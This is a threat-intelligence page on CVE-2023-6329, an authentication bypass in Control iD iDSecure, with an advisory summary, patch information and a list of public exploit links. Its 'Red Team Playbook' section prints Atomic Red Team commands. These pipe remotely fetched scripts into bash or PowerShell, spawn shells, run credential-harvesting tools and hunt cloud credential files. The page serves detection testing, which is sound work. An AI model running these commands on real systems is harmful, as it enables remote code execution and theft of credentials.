CVE-2023-6329
Overview
This vulnerability is an authentication bypass in Control iD iDSecure version 4.7.32.0. The root cause lies in the login routine within the iDS-Core.dll component, specifically the handling of the "passwordCustom" option. This mechanism improperly validates credentials, enabling unauthorized credential computation without proper authentication checks.
Vulnerability Description
An authentication bypass vulnerability exists in Control iD iDSecure v4.7.32.0. The login routine used by iDS-Core.dll contains a "passwordCustom" option that allows an unauthenticated attacker to compute valid credentials that can be used to bypass authentication and act as an administrative user.
Impact
An unauthenticated attacker can leverage this vulnerability to bypass authentication and gain administrative privileges on the affected system. This requires no user interaction and can be performed remotely over the network. The attacker can fully control the system, potentially leading to unauthorized data access, system manipulation, and disruption of services. The CVSS vector (AV:N/AC:L/PR:N/UI:N) confirms that no privileges or user interaction are required, increasing the severity of potential attacks.
Solution
Control iD has addressed this vulnerability in updated versions beyond 4.7.32.0. Users should apply the vendor-released patches as detailed in the advisory available at https://tenable.com/security/research/tra-2023-36. The update corrects the authentication logic in iDS-Core.dll to properly validate the "passwordCustom" option. Administrators are advised to upgrade to the fixed version promptly to mitigate the risk.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
An authentication bypass vulnerability has been identified in Control iD iDSecure version 4.7.32.0, specifically within the login routine of the iDS-Core.dll component. This flaw arises from the presence of a "passwordCustom" option, which allows an unauthenticated attacker to generate valid credentials. By exploiting this weakness, an attacker can effectively bypass the authentication mechanism, gaining unauthorized access to the system as an administrative user. The implications of this vulnerability are severe, as it undermines the fundamental security principle of ensuring that only authorized users can access sensitive functionalities and data.
The attack vectors associated with this vulnerability are particularly concerning due to their simplicity and potential for widespread exploitation. An attacker could leverage this flaw by crafting specific input that manipulates the login routine, thus generating valid credentials without needing any prior authentication. This could be executed remotely, allowing attackers to target vulnerable installations over the internet. Given that the affected product is used in various environments, including potentially critical infrastructure, the ease of exploitation raises alarm bells for security professionals. Scenarios could range from unauthorized data access to complete system takeover, enabling attackers to manipulate or exfiltrate sensitive information.
The real-world impact of this vulnerability is significant, particularly for organizations relying on Control iD iDSecure for their security management. The ability for an attacker to impersonate an administrative user poses a substantial business risk, as it could lead to data breaches, loss of intellectual property, and potential regulatory penalties. Moreover, the compromised integrity of security systems can erode customer trust and damage an organization's reputation. In sectors such as finance, healthcare, and critical infrastructure, the consequences of such an exploitation could be catastrophic, leading to operational disruptions and financial losses.
To detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regularly updating and patching software is crucial, as vendors typically release updates to address known vulnerabilities. Additionally, organizations should conduct thorough security assessments and penetration testing to identify potential weaknesses in their systems. Monitoring logs for unusual authentication attempts or access patterns can also help in early detection of exploitation attempts. Employing network segmentation and least privilege principles can further reduce the attack surface, limiting the potential impact of any successful exploitation.
In conclusion, the authentication bypass vulnerability in Control iD iDSecure presents a critical risk that organizations must address proactively. The ease of exploitation and the potential for severe consequences necessitate immediate attention from security teams. By adopting robust detection and mitigation strategies, organizations can safeguard their systems against such vulnerabilities, ensuring the integrity and confidentiality of their operations. The landscape of cybersecurity is ever-evolving, and vigilance is paramount in protecting against emerging threats.
CSURFACE threat intelligence has identified a slight increase in detection activity related to CVE-2023-6329, indicating continued adversary interest in exploiting the authentication bypass vulnerability in Control iD iDSecure. Despite this uptick, the EPSS score has declined significantly, suggesting a reduced likelihood of widespread exploitation in the immediate term. This divergence between increased detection signals and a falling EPSS score may reflect targeted testing or limited-scope attacks rather than broad campaign activity. The availability of mature proof-of-concept exploits and Metasploit modules continues to lower the barrier for threat actors, maintaining the vulnerability’s critical risk profile. Defenders should interpret these developments as a sign that while exploitation attempts persist, the overall threat momentum may be stabilizing, though vigilance remains essential given the potential for rapid shifts in attacker behavior.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Controlid | Idsecure | 4.7.32.0 |
cpe:2.3:a:controlid:idsecure:4.7.32.0:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Control iD iDSecure Authentication Bypass (CVE-2023-6329)
auxiliary/admin/http/idsecure_auth_bypass
|
Michael Heinzl, Tenable | Unknown | - | View |
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
itzvenom/CVE-2023-6329
CVE-2023-6329 – Authentication bypass PoC for Control iD iDSecure ≤ 4.7.43.0
|
itzvenom | 1 | 0 | 2026-03-11 | View |
Threat Feed
32 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-6329 |
| tenable.com |
GitHub CVE
|
https://tenable.com/security/research/tra-2023-36 |